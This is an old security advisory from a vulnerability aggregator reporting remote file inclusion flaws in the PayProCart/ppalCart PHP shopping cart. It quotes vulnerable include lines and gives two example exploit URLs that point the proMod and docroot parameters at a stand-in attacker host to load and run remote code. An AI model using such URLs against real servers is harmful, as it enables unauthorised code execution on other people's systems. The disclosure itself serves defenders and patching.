Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:14222
HistorySep 12, 2006 - 12:00 a.m.

PayProCart <= 1146078425 Multiple Remote File Include Vulnerabilities

2006-09-1200:00:00
vulners.com
12

±-------------------------------------------------------------------
+

  • ppalCart V(2.5 EE) Remote File Inclusion

±------------------------------------------------------------------
+

±-------------------------------------------------------------------
±-------------------------------------------------------------------

  • ./index Directory …
  • [index.php]

+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+include $docroot . "js/css/shop-custom.php";
+include $docroot . "js/css/shop-default.php";
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
+Line –> 50 - 349
+
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+else if($proMod) {
+include "$proMod" . ".php";
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
+Line –> 288 - 349
+Ex –> http://www.victom.com/index.php?proMod=http://yourevil.com/r0x.txt?cmd
+
±------------------------------------------------------------------
±------------------------------------------------------------------

  • [mainpage.php]

+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+include "$docroot" . "shopincs/commonincs/shop-mainbottom" . "$langFile" . ".php";
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
+Line –> 158 - 308
+
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+include "$docroot" . "tplates/newitems.php";
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
+Line –> 284 - 308
+
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+include "$docroot" . "tplates/specials.php";
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
+Line –> 287 - 308
+
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+include "$docroot" . "cstmincs/cstmbanner$langFile.php";
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
+Line –> 290 - 308
+
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+include "$docroot" . "tplates/upselladvert.php";
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
+Line –> 292 - 308
+
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+include "$docroot" . "mainincs/upsellproducts.php";
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
+Line –> 298 - 308
+Ex –> http://www.victom.com/mainpage.php?docroot=http://yourevil.com/r0x.txt?cmd
+
±-------------------------------------------------------------------
+Eddy_BAck0o ;
±-------------------------------------------------------------------